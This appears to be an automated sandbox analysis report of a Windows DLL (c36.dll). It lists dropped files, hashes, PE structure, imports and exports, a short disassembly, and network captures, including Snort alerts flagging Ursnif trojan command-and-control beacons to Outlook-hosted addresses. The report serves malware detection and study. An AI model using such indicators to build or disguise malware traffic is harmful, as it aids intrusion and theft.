                                    C:\Users\user\AppData\Local\Temp\JavaDeployReg.log
                                    Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                    File Type:ASCII text, with CRLF line terminators
                                    Category:dropped
                                    Size (bytes):89
                                    Entropy (8bit):4.45974266689267
                                    Encrypted:false
                                    SSDEEP:3:oVXUTXWQXIqAW8JOGXnETXWQXINCn:o9UbWQj9qEbWQx
                                    MD5:31F3A28E3C9E0448A4DE020E1CFCE108
                                    SHA1:7973A0BA483BCDC71D6B4019EED8E339FDD3A4A2
                                    SHA-256:B996A2D4F7C4BFE8D9768D73D98F5ADBF990DFD46F31592BC98456A97861E47B
                                    SHA-512:7382AF998560B796D3F4C852AAF037943DE1A7CF13B377A73931DA0318CEE03CA295F950BD7181F66402B667D96651D9B7DA61556C902D6768DD0D68259862D6
                                    Malicious:false
                                    Preview: [2021/07/09 15:24:32.452] Latest deploy version: ..[2021/07/09 15:24:32.452] 11.211.2 ..
                                    C:\Users\user\AppData\Local\Temp\~DF07D76F7116EA20F8.TMP
                                    Process:C:\Program Files\internet explorer\iexplore.exe
                                    File Type:data
                                    Category:dropped
                                    Size (bytes):39673
                                    Entropy (8bit):0.5785657953581591
                                    Encrypted:false
                                    SSDEEP:96:kBqoxKAuvScS+djBgDtqQF/9DqQF/9LqQF/9Q:kBqoxKAuqR+djBgDtqCFDqCFLqCFQ
                                    MD5:43C08021A5463B6D50E11C9B0BAA362B
                                    SHA1:EDB06BDF34E9CB9AA26AE49B9C86E4CAE07C455D
                                    SHA-256:1E0EBF8E779D2B155A35E19C0E03DF9BD10B71AF760681FD2EF7B7423CF1F67C
                                    SHA-512:739BA552A407DF3BE4136C6180ADCC94474DEFCAAEAF689439B218C03F8E6FC00ABD733CA5B80160AC036E3B68D7EC62DA83B91B48FE6BE36119BF8A4565D0F0
                                    Malicious:false
                                    Preview: .............................*%..H..M..{y..+.0...(................... ...............................................*%..H..M..{y..+.0...(................... ..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                    C:\Users\user\AppData\Local\Temp\~DFD1208600E5902E85.TMP
                                    Process:C:\Program Files\internet explorer\iexplore.exe
                                    File Type:data
                                    Category:dropped
                                    Size (bytes):12933
                                    Entropy (8bit):0.4077520377433156
                                    Encrypted:false
                                    SSDEEP:24:c9lLh9lLh9lIn9lIn9lofF9lo99lWBKZuZ5:kBqoIGY0C5
                                    MD5:CF36976683EF379314E18BCFA7B64F2B
                                    SHA1:63F70513C6EE4995434753552B1C08602CA2145E
                                    SHA-256:7194824FCFF90202061DE09AE7017A032227DAC4FA8EDD025BF60BD0B18CAB48
                                    SHA-512:6EE26E39E72414E447954280B7F418CAB1C9FAB75D7F2254EB5753FA3B4703CED4BFD2F254811B0B72F866800D021EC4C7A43C4CFD9A30CDB269ED402B8BF28A
                                    Malicious:false
                                    Preview: .............................*%..H..M..{y..+.0...(................... ...............................................*%..H..M..{y..+.0...(................... ..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                    Static File Info

                                    General

                                    File type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                    Entropy (8bit):6.699066149824432
                                    TrID:
                                    • Win32 Dynamic Link Library (generic) (1002004/3) 99.60%
                                    • Generic Win/DOS Executable (2004/3) 0.20%
                                    • DOS Executable Generic (2002/1) 0.20%
                                    • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                    File name:c36.dll
                                    File size:421376
                                    MD5:c36ab737db2b6d11fb1f443f8117a7fa
                                    SHA1:e6fab2798dd6088aa3527a01ae1b3f2415cf40cf
                                    SHA256:181fe6714ebaff8c1855e8e1dbac545ffd160df0ec96ddf920c5155916b7111b
                                    SHA512:04884ebda245977509b16eddc89a057582f47cc315610ba040750313bdb668d5377fec118f9c6d7934c7369c3b40d09cb084ec22c71979316ed32860538b0fa9
                                    SSDEEP:6144:XoiHyepaXa+Cv3FyUtySzhyq++rWM+AVF7tct2PytUDlrfu+U39O:YfGFvFu8hPwM+AVLcMKtKtK
                                    File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$......./"j.kC..kC..kC..u...sC..u....C..b;..lC..kC...C..u...RC..u...jC..u...jC..u...jC..RichkC..................PE..L.....+L...........

                                    File Icon

                                    Icon Hash:74f0e4ecccdce0e4

                                    Static PE Info

                                    General

                                    Entrypoint:0x1036ead
                                    Entrypoint Section:.text
                                    Digitally signed:false
                                    Imagebase:0x1000000
                                    Subsystem:windows gui
                                    Image File Characteristics:32BIT_MACHINE, EXECUTABLE_IMAGE, DLL
                                    DLL Characteristics:DYNAMIC_BASE
                                    Time Stamp:0x4C2B8293 [Wed Jun 30 17:44:51 2010 UTC]
                                    TLS Callbacks:
                                    CLR (.Net) Version:
                                    OS Version Major:5
                                    OS Version Minor:0
                                    File Version Major:5
                                    File Version Minor:0
                                    Subsystem Version Major:5
                                    Subsystem Version Minor:0
                                    Import Hash:9ac2df5a14a0377b217ae274fd22ed43

                                    Entrypoint Preview

                                    Instruction
                                    mov edi, edi
                                    push ebp
                                    mov ebp, esp
                                    cmp dword ptr [ebp+0Ch], 01h
                                    jne 00007FF678D92B27h
                                    call 00007FF678D9E142h
                                    push dword ptr [ebp+08h]
                                    mov ecx, dword ptr [ebp+10h]
                                    mov edx, dword ptr [ebp+0Ch]
                                    call 00007FF678D92A11h
                                    pop ecx
                                    pop ebp
                                    retn 000Ch
                                    mov edi, edi
                                    push ebp
                                    mov ebp, esp
                                    sub esp, 00000328h
                                    mov eax, dword ptr [01062480h]
                                    xor eax, ebp
                                    mov dword ptr [ebp-04h], eax
                                    test byte ptr [01062500h], 00000001h
                                    push esi
                                    je 00007FF678D92B2Ah
                                    push 0000000Ah
                                    call 00007FF678D98B9Ah
                                    pop ecx
                                    call 00007FF678D9E1EEh
                                    test eax, eax
                                    je 00007FF678D92B2Ah
                                    push 00000016h
                                    call 00007FF678D9E1F0h
                                    pop ecx
                                    test byte ptr [01062500h], 00000002h
                                    je 00007FF678D92BF0h
                                    mov dword ptr [ebp-00000220h], eax
                                    mov dword ptr [ebp-00000224h], ecx
                                    mov dword ptr [ebp-00000228h], edx
                                    mov dword ptr [ebp-0000022Ch], ebx
                                    mov dword ptr [ebp-00000230h], esi
                                    mov dword ptr [ebp-00000234h], edi
                                    mov word ptr [ebp-00000208h], ss
                                    mov word ptr [ebp-00000214h], cs
                                    mov word ptr [ebp-00000238h], ds
                                    mov word ptr [ebp-0000023Ch], es
                                    mov word ptr [ebp-00000240h], fs
                                    mov word ptr [ebp-00000244h], gs
                                    pushfd
                                    pop dword ptr [ebp-00000210h]
                                    mov esi, dword ptr [ebp+04h]
                                    lea eax, dword ptr [ebp+04h]
                                    mov dword ptr [ebp+00FFFDF4h], eax

                                    Rich Headers

                                    Programming Language:
                                    • [ C ] VS2008 build 21022
                                    • [ASM] VS2008 build 21022
                                    • [LNK] VS2008 build 21022
                                    • [RES] VS2008 build 21022
                                    • [EXP] VS2008 build 21022
                                    • [IMP] VS2008 SP1 build 30729
                                    • [C++] VS2008 build 21022

                                    Data Directories

                                    NameVirtual AddressVirtual Size Is in Section
                                    IMAGE_DIRECTORY_ENTRY_EXPORT0x619e00x85.rdata
                                    IMAGE_DIRECTORY_ENTRY_IMPORT0x610140x50.rdata
                                    IMAGE_DIRECTORY_ENTRY_RESOURCE0xfc0000xd80.rsrc
                                    IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                    IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                    IMAGE_DIRECTORY_ENTRY_BASERELOC0xfd0000x2768.reloc
                                    IMAGE_DIRECTORY_ENTRY_DEBUG0x4b2200x1c.rdata
                                    IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                    IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                    IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                    IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x5f7000x40.rdata
                                    IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                    IMAGE_DIRECTORY_ENTRY_IAT0x4b0000x1ac.rdata
                                    IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                    IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                    IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                    Sections

                                    NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                    .text0x10000x49dbd0x49e00False0.661458333333data6.64292711487IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                    .rdata0x4b0000x16a650x16c00False0.650519402473data6.09504929451IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                    .data0x620000x998c80x1800False0.343587239583data3.99466653624IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                                    .rsrc0xfc0000xd800xe00False0.364397321429data3.40694082872IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                    .reloc0xfd0000x39280x3a00False0.554485452586data5.40101717847IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                    Resources

                                    NameRVASizeTypeLanguageCountry
                                    RT_DIALOG0xfc2500xcedataEnglishUnited States
                                    RT_DIALOG0xfc3200x112dataEnglishUnited States
                                    RT_DIALOG0xfc4380x13adataEnglishUnited States
                                    RT_DIALOG0xfc5780xf2dataEnglishUnited States
                                    RT_DIALOG0xfc6700x11adataEnglishUnited States
                                    RT_DIALOG0xfc7900xf0dataEnglishUnited States
                                    RT_DIALOG0xfc8800xf8dataEnglishUnited States
                                    RT_DIALOG0xfc9780xcadataEnglishUnited States
                                    RT_DIALOG0xfca480xeadataEnglishUnited States
                                    RT_DIALOG0xfcb380xc8dataEnglishUnited States
                                    RT_MANIFEST0xfcc000x17dXML 1.0 document textEnglishUnited States

                                    Imports

                                    DLLImport
                                    KERNEL32.dllCreateProcessA, GetStartupInfoA, CopyFileA, DeleteFileA, CloseHandle, GetTickCount, Sleep, GetCurrentThreadId, GetProcAddress, LoadLibraryA, VirtualProtectEx, GetEnvironmentVariableA, GetTempPathA, GetWindowsDirectoryA, SetConsoleCP, SetConsoleOutputCP, GetCurrentDirectoryA, CompareStringW, CompareStringA, CreateFileA, GetLocaleInfoW, SetStdHandle, WriteConsoleW, GetConsoleOutputCP, WriteConsoleA, InitializeCriticalSectionAndSpinCount, SetFilePointer, ReadFile, FlushFileBuffers, GetConsoleMode, GetConsoleCP, InterlockedIncrement, InterlockedDecrement, WideCharToMultiByte, InterlockedExchange, InitializeCriticalSection, DeleteCriticalSection, EnterCriticalSection, LeaveCriticalSection, MultiByteToWideChar, GetSystemTimeAsFileTime, HeapAlloc, RtlUnwind, RaiseException, TerminateProcess, GetCurrentProcess, UnhandledExceptionFilter, SetUnhandledExceptionFilter, IsDebuggerPresent, GetCommandLineA, GetLastError, HeapFree, GetCPInfo, LCMapStringA, LCMapStringW, GetModuleHandleW, TlsGetValue, TlsAlloc, TlsSetValue, TlsFree, SetLastError, GetTimeZoneInformation, VirtualFree, VirtualAlloc, HeapReAlloc, HeapCreate, HeapDestroy, ExitProcess, WriteFile, GetStdHandle, GetModuleFileNameA, GetACP, GetOEMCP, IsValidCodePage, GetUserDefaultLCID, GetLocaleInfoA, EnumSystemLocalesA, IsValidLocale, GetStringTypeA, GetStringTypeW, GetModuleHandleA, SetHandleCount, GetFileType, FreeEnvironmentStringsA, GetEnvironmentStrings, FreeEnvironmentStringsW, GetEnvironmentStringsW, QueryPerformanceCounter, GetCurrentProcessId, HeapSize, SetEnvironmentVariableA
                                    USER32.dllGetClientRect, GetDesktopWindow, CreateDialogIndirectParamA, GetForegroundWindow, GetWindowRect, DialogBoxIndirectParamA, CreatePopupMenu, GetSysColorBrush, DispatchMessageA
                                    ole32.dllCoTaskMemFree, CoTaskMemAlloc, CoInitialize, CoUninitialize

                                    Exports

                                    NameOrdinalAddress
                                    Beautyresult10x102c990
                                    Division20x102da30
                                    Fastcolor30x102d940
                                    Yetclose40x102dcb0

                                    Possible Origin

                                    Language of compilation systemCountry where language is spokenMap
                                    EnglishUnited States

                                    Network Behavior

                                    Snort IDS Alerts

                                    TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                    07/09/21-15:24:33.634449TCP2033204ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F)4972980192.168.2.340.97.128.194
                                    07/09/21-15:24:33.634449TCP2033203ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B)4972980192.168.2.340.97.128.194

                                    Network Port Distribution

                                    TCP Packets

                                    TimestampSource PortDest PortSource IPDest IP
                                    Jul 9, 2021 15:24:33.507741928 CEST4972980192.168.2.340.97.128.194
                                    Jul 9, 2021 15:24:33.508086920 CEST4973080192.168.2.340.97.128.194
                                    Jul 9, 2021 15:24:33.633079052 CEST804972940.97.128.194192.168.2.3
                                    Jul 9, 2021 15:24:33.633184910 CEST4972980192.168.2.340.97.128.194
                                    Jul 9, 2021 15:24:33.634449005 CEST4972980192.168.2.340.97.128.194
                                    Jul 9, 2021 15:24:33.636660099 CEST804973040.97.128.194192.168.2.3
                                    Jul 9, 2021 15:24:33.636779070 CEST4973080192.168.2.340.97.128.194
                                    Jul 9, 2021 15:24:33.761584997 CEST804972940.97.128.194192.168.2.3
                                    Jul 9, 2021 15:24:33.761776924 CEST4972980192.168.2.340.97.128.194
                                    Jul 9, 2021 15:24:33.762681961 CEST4972980192.168.2.340.97.128.194
                                    Jul 9, 2021 15:24:33.786556005 CEST49731443192.168.2.340.97.128.194
                                    Jul 9, 2021 15:24:33.886631966 CEST804972940.97.128.194192.168.2.3
                                    Jul 9, 2021 15:24:33.915479898 CEST4434973140.97.128.194192.168.2.3
                                    Jul 9, 2021 15:24:33.915713072 CEST49731443192.168.2.340.97.128.194
                                    Jul 9, 2021 15:24:33.929497004 CEST49731443192.168.2.340.97.128.194
                                    Jul 9, 2021 15:24:34.060129881 CEST4434973140.97.128.194192.168.2.3
                                    Jul 9, 2021 15:24:34.060195923 CEST4434973140.97.128.194192.168.2.3
                                    Jul 9, 2021 15:24:34.060220003 CEST4434973140.97.128.194192.168.2.3
                                    Jul 9, 2021 15:24:34.060425997 CEST49731443192.168.2.340.97.128.194
                                    Jul 9, 2021 15:24:34.060448885 CEST49731443192.168.2.340.97.128.194
                                    Jul 9, 2021 15:24:34.113426924 CEST49731443192.168.2.340.97.128.194
                                    Jul 9, 2021 15:24:34.117860079 CEST49731443192.168.2.340.97.128.194
                                    Jul 9, 2021 15:24:34.243573904 CEST4434973140.97.128.194192.168.2.3
                                    Jul 9, 2021 15:24:34.243865013 CEST49731443192.168.2.340.97.128.194
                                    Jul 9, 2021 15:24:34.248527050 CEST4434973140.97.128.194192.168.2.3
                                    Jul 9, 2021 15:24:34.252892971 CEST49731443192.168.2.340.97.128.194
                                    Jul 9, 2021 15:24:34.252932072 CEST49731443192.168.2.340.97.128.194
                                    Jul 9, 2021 15:24:34.303044081 CEST49732443192.168.2.352.98.163.18
                                    Jul 9, 2021 15:24:34.303044081 CEST49733443192.168.2.352.98.163.18
                                    Jul 9, 2021 15:24:34.315371037 CEST4434973352.98.163.18192.168.2.3
                                    Jul 9, 2021 15:24:34.315510035 CEST4434973252.98.163.18192.168.2.3
                                    Jul 9, 2021 15:24:34.315514088 CEST49733443192.168.2.352.98.163.18
                                    Jul 9, 2021 15:24:34.315687895 CEST49732443192.168.2.352.98.163.18
                                    Jul 9, 2021 15:24:34.316931009 CEST49732443192.168.2.352.98.163.18
                                    Jul 9, 2021 15:24:34.317018986 CEST49733443192.168.2.352.98.163.18
                                    Jul 9, 2021 15:24:34.330826998 CEST4434973352.98.163.18192.168.2.3
                                    Jul 9, 2021 15:24:34.330893040 CEST4434973252.98.163.18192.168.2.3
                                    Jul 9, 2021 15:24:34.330934048 CEST4434973252.98.163.18192.168.2.3
                                    Jul 9, 2021 15:24:34.330981016 CEST4434973252.98.163.18192.168.2.3
                                    Jul 9, 2021 15:24:34.331026077 CEST4434973352.98.163.18192.168.2.3
                                    Jul 9, 2021 15:24:34.331043959 CEST49732443192.168.2.352.98.163.18
                                    Jul 9, 2021 15:24:34.331063032 CEST4434973352.98.163.18192.168.2.3
                                    Jul 9, 2021 15:24:34.331074953 CEST49733443192.168.2.352.98.163.18
                                    Jul 9, 2021 15:24:34.331132889 CEST49732443192.168.2.352.98.163.18
                                    Jul 9, 2021 15:24:34.331195116 CEST49733443192.168.2.352.98.163.18
                                    Jul 9, 2021 15:24:34.341037989 CEST49732443192.168.2.352.98.163.18
                                    Jul 9, 2021 15:24:34.350852966 CEST49732443192.168.2.352.98.163.18
                                    Jul 9, 2021 15:24:34.351823092 CEST49733443192.168.2.352.98.163.18
                                    Jul 9, 2021 15:24:34.354607105 CEST4434973252.98.163.18192.168.2.3
                                    Jul 9, 2021 15:24:34.354799986 CEST49732443192.168.2.352.98.163.18
                                    Jul 9, 2021 15:24:34.365852118 CEST4434973352.98.163.18192.168.2.3
                                    Jul 9, 2021 15:24:34.366991997 CEST4434973252.98.163.18192.168.2.3
                                    Jul 9, 2021 15:24:34.367846966 CEST49732443192.168.2.352.98.163.18
                                    Jul 9, 2021 15:24:34.367846966 CEST49733443192.168.2.352.98.163.18
                                    Jul 9, 2021 15:24:34.368366957 CEST49732443192.168.2.352.98.163.18
                                    Jul 9, 2021 15:24:34.381774902 CEST4434973140.97.128.194192.168.2.3
                                    Jul 9, 2021 15:24:34.382589102 CEST4434973252.98.163.18192.168.2.3
                                    Jul 9, 2021 15:24:34.413362980 CEST49734443192.168.2.352.97.201.194
                                    Jul 9, 2021 15:24:34.413582087 CEST49735443192.168.2.352.97.201.194
                                    Jul 9, 2021 15:24:34.425853968 CEST4434973552.97.201.194192.168.2.3
                                    Jul 9, 2021 15:24:34.425878048 CEST4434973452.97.201.194192.168.2.3
                                    Jul 9, 2021 15:24:34.427479029 CEST49735443192.168.2.352.97.201.194
                                    Jul 9, 2021 15:24:34.427491903 CEST49735443192.168.2.352.97.201.194
                                    Jul 9, 2021 15:24:34.427607059 CEST49734443192.168.2.352.97.201.194
                                    Jul 9, 2021 15:24:34.429343939 CEST49734443192.168.2.352.97.201.194
                                    Jul 9, 2021 15:24:34.441689014 CEST4434973552.97.201.194192.168.2.3
                                    Jul 9, 2021 15:24:34.441715956 CEST4434973552.97.201.194192.168.2.3
                                    Jul 9, 2021 15:24:34.441732883 CEST4434973552.97.201.194192.168.2.3
                                    Jul 9, 2021 15:24:34.442029953 CEST49735443192.168.2.352.97.201.194
                                    Jul 9, 2021 15:24:34.443164110 CEST4434973452.97.201.194192.168.2.3
                                    Jul 9, 2021 15:24:34.443254948 CEST4434973452.97.201.194192.168.2.3
                                    Jul 9, 2021 15:24:34.444747925 CEST4434973452.97.201.194192.168.2.3
                                    Jul 9, 2021 15:24:34.444757938 CEST49734443192.168.2.352.97.201.194
                                    Jul 9, 2021 15:24:34.444782019 CEST49734443192.168.2.352.97.201.194
                                    Jul 9, 2021 15:24:34.447962046 CEST49734443192.168.2.352.97.201.194
                                    Jul 9, 2021 15:24:34.452936888 CEST49735443192.168.2.352.97.201.194
                                    Jul 9, 2021 15:24:34.454736948 CEST49735443192.168.2.352.97.201.194
                                    Jul 9, 2021 15:24:34.456970930 CEST49734443192.168.2.352.97.201.194
                                    Jul 9, 2021 15:24:34.467066050 CEST4434973552.97.201.194192.168.2.3
                                    Jul 9, 2021 15:24:34.467705965 CEST4434973552.97.201.194192.168.2.3
                                    Jul 9, 2021 15:24:34.468261003 CEST49735443192.168.2.352.97.201.194
                                    Jul 9, 2021 15:24:34.470284939 CEST4434973452.97.201.194192.168.2.3
                                    Jul 9, 2021 15:24:34.470416069 CEST49734443192.168.2.352.97.201.194
                                    Jul 9, 2021 15:24:34.480480909 CEST4434973552.97.201.194192.168.2.3
                                    Jul 9, 2021 15:24:34.480509043 CEST4434973552.97.201.194192.168.2.3
                                    Jul 9, 2021 15:24:34.481842041 CEST49735443192.168.2.352.97.201.194
                                    Jul 9, 2021 15:24:35.952073097 CEST4973080192.168.2.340.97.128.194
                                    Jul 9, 2021 15:24:35.952291965 CEST49733443192.168.2.352.98.163.18
                                    Jul 9, 2021 15:24:35.952323914 CEST49734443192.168.2.352.97.201.194
                                    Jul 9, 2021 15:24:35.953020096 CEST49735443192.168.2.352.97.201.194

                                    UDP Packets

                                    TimestampSource PortDest PortSource IPDest IP
                                    Jul 9, 2021 15:23:02.737814903 CEST5754453192.168.2.38.8.8.8
                                    Jul 9, 2021 15:23:02.751353025 CEST53575448.8.8.8192.168.2.3
                                    Jul 9, 2021 15:23:03.688863993 CEST5598453192.168.2.38.8.8.8
                                    Jul 9, 2021 15:23:03.702208996 CEST53559848.8.8.8192.168.2.3
                                    Jul 9, 2021 15:23:04.216675997 CEST6418553192.168.2.38.8.8.8
                                    Jul 9, 2021 15:23:04.237498045 CEST53641858.8.8.8192.168.2.3
                                    Jul 9, 2021 15:23:04.677397013 CEST6511053192.168.2.38.8.8.8
                                    Jul 9, 2021 15:23:04.691787958 CEST53651108.8.8.8192.168.2.3
                                    Jul 9, 2021 15:23:05.325028896 CEST5836153192.168.2.38.8.8.8
                                    Jul 9, 2021 15:23:05.338064909 CEST53583618.8.8.8192.168.2.3
                                    Jul 9, 2021 15:23:06.326881886 CEST6349253192.168.2.38.8.8.8
                                    Jul 9, 2021 15:23:06.340981007 CEST53634928.8.8.8192.168.2.3
                                    Jul 9, 2021 15:23:07.086497068 CEST6083153192.168.2.38.8.8.8
                                    Jul 9, 2021 15:23:07.099680901 CEST53608318.8.8.8192.168.2.3
                                    Jul 9, 2021 15:23:08.259793043 CEST6010053192.168.2.38.8.8.8
                                    Jul 9, 2021 15:23:08.272742033 CEST53601008.8.8.8192.168.2.3
                                    Jul 9, 2021 15:23:09.378868103 CEST5319553192.168.2.38.8.8.8
                                    Jul 9, 2021 15:23:09.392980099 CEST53531958.8.8.8192.168.2.3
                                    Jul 9, 2021 15:23:10.391124964 CEST5014153192.168.2.38.8.8.8
                                    Jul 9, 2021 15:23:10.407327890 CEST53501418.8.8.8192.168.2.3
                                    Jul 9, 2021 15:23:11.215621948 CEST5302353192.168.2.38.8.8.8
                                    Jul 9, 2021 15:23:11.236013889 CEST53530238.8.8.8192.168.2.3
                                    Jul 9, 2021 15:23:52.467493057 CEST4956353192.168.2.38.8.8.8
                                    Jul 9, 2021 15:23:52.515966892 CEST53495638.8.8.8192.168.2.3
                                    Jul 9, 2021 15:24:06.116390944 CEST5135253192.168.2.38.8.8.8
                                    Jul 9, 2021 15:24:06.129160881 CEST53513528.8.8.8192.168.2.3
                                    Jul 9, 2021 15:24:06.942337036 CEST5934953192.168.2.38.8.8.8
                                    Jul 9, 2021 15:24:06.955936909 CEST53593498.8.8.8192.168.2.3
                                    Jul 9, 2021 15:24:07.828459978 CEST5708453192.168.2.38.8.8.8
                                    Jul 9, 2021 15:24:07.855434895 CEST53570848.8.8.8192.168.2.3
                                    Jul 9, 2021 15:24:08.206068039 CEST5882353192.168.2.38.8.8.8
                                    Jul 9, 2021 15:24:08.221400976 CEST53588238.8.8.8192.168.2.3
                                    Jul 9, 2021 15:24:08.921717882 CEST5756853192.168.2.38.8.8.8
                                    Jul 9, 2021 15:24:08.934693098 CEST53575688.8.8.8192.168.2.3
                                    Jul 9, 2021 15:24:10.140501976 CEST5054053192.168.2.38.8.8.8
                                    Jul 9, 2021 15:24:10.154294014 CEST53505408.8.8.8192.168.2.3
                                    Jul 9, 2021 15:24:11.484508991 CEST5436653192.168.2.38.8.8.8
                                    Jul 9, 2021 15:24:11.497576952 CEST53543668.8.8.8192.168.2.3
                                    Jul 9, 2021 15:24:13.144767046 CEST5303453192.168.2.38.8.8.8
                                    Jul 9, 2021 15:24:13.157658100 CEST53530348.8.8.8192.168.2.3
                                    Jul 9, 2021 15:24:29.787411928 CEST5776253192.168.2.38.8.8.8
                                    Jul 9, 2021 15:24:29.807204008 CEST53577628.8.8.8192.168.2.3
                                    Jul 9, 2021 15:24:33.469208956 CEST5543553192.168.2.38.8.8.8
                                    Jul 9, 2021 15:24:33.482678890 CEST53554358.8.8.8192.168.2.3
                                    Jul 9, 2021 15:24:34.285837889 CEST5071353192.168.2.38.8.8.8
                                    Jul 9, 2021 15:24:34.300118923 CEST53507138.8.8.8192.168.2.3
                                    Jul 9, 2021 15:24:34.386554956 CEST5613253192.168.2.38.8.8.8
                                    Jul 9, 2021 15:24:34.399265051 CEST53561328.8.8.8192.168.2.3
                                    Jul 9, 2021 15:24:50.065752029 CEST5898753192.168.2.38.8.8.8
                                    Jul 9, 2021 15:24:50.079216003 CEST53589878.8.8.8192.168.2.3
                                    Jul 9, 2021 15:24:55.995177031 CEST5657953192.168.2.38.8.8.8
                                    Jul 9, 2021 15:24:56.008249044 CEST53565798.8.8.8192.168.2.3
                                    Jul 9, 2021 15:24:59.628042936 CEST6063353192.168.2.38.8.8.8
                                    Jul 9, 2021 15:24:59.641279936 CEST53606338.8.8.8192.168.2.3
                                    Jul 9, 2021 15:25:00.639893055 CEST6063353192.168.2.38.8.8.8
                                    Jul 9, 2021 15:25:00.655927896 CEST53606338.8.8.8192.168.2.3
                                    Jul 9, 2021 15:25:01.687092066 CEST6063353192.168.2.38.8.8.8
                                    Jul 9, 2021 15:25:01.701251030 CEST53606338.8.8.8192.168.2.3
                                    Jul 9, 2021 15:25:03.690778017 CEST6063353192.168.2.38.8.8.8
                                    Jul 9, 2021 15:25:03.707277060 CEST53606338.8.8.8192.168.2.3
                                    Jul 9, 2021 15:25:04.373759985 CEST6129253192.168.2.38.8.8.8
                                    Jul 9, 2021 15:25:04.393018961 CEST53612928.8.8.8192.168.2.3
                                    Jul 9, 2021 15:25:07.742360115 CEST6063353192.168.2.38.8.8.8
                                    Jul 9, 2021 15:25:07.757781982 CEST53606338.8.8.8192.168.2.3

                                    DNS Queries

                                    TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                    Jul 9, 2021 15:24:33.469208956 CEST192.168.2.38.8.8.80x6450Standard query (0)outlook.comA (IP address)IN (0x0001)
                                    Jul 9, 2021 15:24:34.285837889 CEST192.168.2.38.8.8.80xcc0bStandard query (0)www.outlook.comA (IP address)IN (0x0001)
                                    Jul 9, 2021 15:24:34.386554956 CEST192.168.2.38.8.8.80xa524Standard query (0)outlook.office365.comA (IP address)IN (0x0001)

                                    DNS Answers

                                    TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                    Jul 9, 2021 15:24:33.482678890 CEST8.8.8.8192.168.2.30x6450No error (0)outlook.com40.97.128.194A (IP address)IN (0x0001)
                                    Jul 9, 2021 15:24:33.482678890 CEST8.8.8.8192.168.2.30x6450No error (0)outlook.com40.97.156.114A (IP address)IN (0x0001)
                                    Jul 9, 2021 15:24:33.482678890 CEST8.8.8.8192.168.2.30x6450No error (0)outlook.com40.97.153.146A (IP address)IN (0x0001)
                                    Jul 9, 2021 15:24:33.482678890 CEST8.8.8.8192.168.2.30x6450No error (0)outlook.com40.97.116.82A (IP address)IN (0x0001)
                                    Jul 9, 2021 15:24:33.482678890 CEST8.8.8.8192.168.2.30x6450No error (0)outlook.com40.97.161.50A (IP address)IN (0x0001)
                                    Jul 9, 2021 15:24:33.482678890 CEST8.8.8.8192.168.2.30x6450No error (0)outlook.com40.97.160.2A (IP address)IN (0x0001)
                                    Jul 9, 2021 15:24:33.482678890 CEST8.8.8.8192.168.2.30x6450No error (0)outlook.com40.97.148.226A (IP address)IN (0x0001)
                                    Jul 9, 2021 15:24:33.482678890 CEST8.8.8.8192.168.2.30x6450No error (0)outlook.com40.97.164.146A (IP address)IN (0x0001)
                                    Jul 9, 2021 15:24:34.300118923 CEST8.8.8.8192.168.2.30xcc0bNo error (0)www.outlook.comoutlook.office365.comCNAME (Canonical name)IN (0x0001)
                                    Jul 9, 2021 15:24:34.300118923 CEST8.8.8.8192.168.2.30xcc0bNo error (0)outlook.office365.comoutlook.ha.office365.comCNAME (Canonical name)IN (0x0001)
                                    Jul 9, 2021 15:24:34.300118923 CEST8.8.8.8192.168.2.30xcc0bNo error (0)outlook.ha.office365.comoutlook.ms-acdc.office.comCNAME (Canonical name)IN (0x0001)
                                    Jul 9, 2021 15:24:34.300118923 CEST8.8.8.8192.168.2.30xcc0bNo error (0)outlook.ms-acdc.office.comZRH-efz.ms-acdc.office.comCNAME (Canonical name)IN (0x0001)
                                    Jul 9, 2021 15:24:34.300118923 CEST8.8.8.8192.168.2.30xcc0bNo error (0)ZRH-efz.ms-acdc.office.com52.98.163.18A (IP address)IN (0x0001)
                                    Jul 9, 2021 15:24:34.300118923 CEST8.8.8.8192.168.2.30xcc0bNo error (0)ZRH-efz.ms-acdc.office.com52.97.232.194A (IP address)IN (0x0001)
                                    Jul 9, 2021 15:24:34.300118923 CEST8.8.8.8192.168.2.30xcc0bNo error (0)ZRH-efz.ms-acdc.office.com52.97.201.210A (IP address)IN (0x0001)
                                    Jul 9, 2021 15:24:34.300118923 CEST8.8.8.8192.168.2.30xcc0bNo error (0)ZRH-efz.ms-acdc.office.com52.97.232.210A (IP address)IN (0x0001)
                                    Jul 9, 2021 15:24:34.399265051 CEST8.8.8.8192.168.2.30xa524No error (0)outlook.office365.comoutlook.ha.office365.comCNAME (Canonical name)IN (0x0001)
